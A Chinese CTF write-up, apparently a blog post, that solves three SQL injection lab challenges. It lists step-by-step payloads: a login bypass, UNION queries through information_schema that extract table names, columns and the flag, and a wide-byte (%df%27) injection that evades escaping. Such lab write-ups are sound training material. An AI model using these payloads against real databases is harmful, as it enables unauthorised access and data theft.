【writeup】网安实验室hackinglab 注入类

【题目1】

最简单的SQL注入

分值: 100

最简单的SQL注入

 

【思路】

  本题未做任何防护,可以考虑在用户名处:1' or 1=1 --      通过闭合单引号,然后注释掉后面原有的单引号来注入

  密码随便填写即可

 

【题目2】

最简单的SQL注入(熟悉注入环境)

分值: 100

最简单的SQL注入

 

【思路】

1. index.php?id=1'     发现报错回显

2. ?id=1 and 1=1       页面正常

3. 通过order by   发现共有三个字段

4. index.php?id=1 union select 1, TABLE_NAME, 3 from information_schema.TABLES where TABLE_SCHEMA = database()

     回显得知表名为   sae_user_sqli3

5. index.php?id=1 union select 1, COLUMN_NAME, 3 from information_schema.COLUMNS where TABLE_NAME = 'sae_user_sqli3'      回显得知 存在的三个字段 分别为 id, title, content   

6. index.php?id=1 union select 1, content, 3 from sae_user_sqli3       拿到flag

 

【题目3】   

防注入

分值: 300

小明终于知道,原来黑客如此的吊,还有sql注入这种高端技术,因此他开始学习防注入!

【思路】

1. index.php?id=1%df%27   发现页面回显报错,可能存在宽字节注入

2. index.php?id=1%df%27 order by 3  %23         有三个字段

3.  跟上一题一样,爆出表名,然后转成16进制

4. ?id=1%df%27  union select 1, group_concat(column_name), 2 from information_schema.COLUMNS where TABLE_NAME =  0x7361655f757365725f73716c6934  %23     爆出三个字段

5. ?id=1%df%27 union select 1, 2, content_1 from  sae_user_sqli4 limit 2,1 %23  拿到flag

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值